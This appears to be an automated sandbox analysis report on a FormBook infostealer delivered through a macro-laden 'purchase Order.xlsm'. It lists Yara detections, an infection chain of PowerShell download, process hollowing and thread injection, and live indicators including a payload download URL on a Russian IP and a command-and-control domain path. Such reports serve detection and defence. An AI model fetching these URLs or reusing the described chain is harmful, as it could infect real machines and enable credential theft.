Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10007A00 RpcStringBindingComposeA,RpcBindingFromStringBindingA,RpcStringFreeA, 8_2_10007A00
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10007A90 RpcBindingFree, 8_2_10007A90
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 510341 Sample: purchase Order.xlsm Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 63 Multi AV Scanner detection for domain / URL 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 11 other signatures 2->69 11 explorer.exe 2->11         started        13 EXCEL.EXE 25 22 2->13         started        process3 file4 16 eVJOpc.exe 17 11->16         started        43 C:\Users\user\Desktop\~$purchase Order.xlsm, data 13->43 dropped 45 C:\Users\user\...\purchase Order.xlsm (copy), Microsoft 13->45 dropped 20 powershell.exe 15 18 13->20         started        process5 dnsIp6 39 C:\Users\user\AppData\...\qqxmvpxcvyt.dll, PE32 16->39 dropped 51 Antivirus detection for dropped file 16->51 53 Multi AV Scanner detection for dropped file 16->53 55 Machine Learning detection for dropped file 16->55 61 2 other signatures 16->61 23 eVJOpc.exe 16->23         started        47 212.192.241.75, 49746, 80 RAPMSB-ASRU Russian Federation 20->47 41 C:\Users\Public\eVJOpc.exe, PE32 20->41 dropped 57 Drops PE files to the user root directory 20->57 59 Powershell drops PE file 20->59 26 explorer.exe 1 20->26         started        28 conhost.exe 20->28         started        file7 signatures8 process9 signatures10 71 Modifies the context of a thread in another process (thread injection) 23->71 73 Maps a DLL or memory area into another process 23->73 75 Sample uses process hollowing technique 23->75 77 Queues an APC in another process (thread injection) 23->77 30 explorer.exe 23->30 injected process11 process12 32 wlanext.exe 30->32         started        signatures13 49 Tries to detect virtualization through RDTSC time measurements 32->49 35 cmd.exe 1 32->35         started        process14 process15 37 conhost.exe 35->37         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
212.192.241.75
 unknown Russian Federation
61269 RAPMSB-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://212.192.241.75/sam/new3.exe true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
www.art-for-a-cause.com/m5cw/ true
  • Avira URL Cloud: malware
 low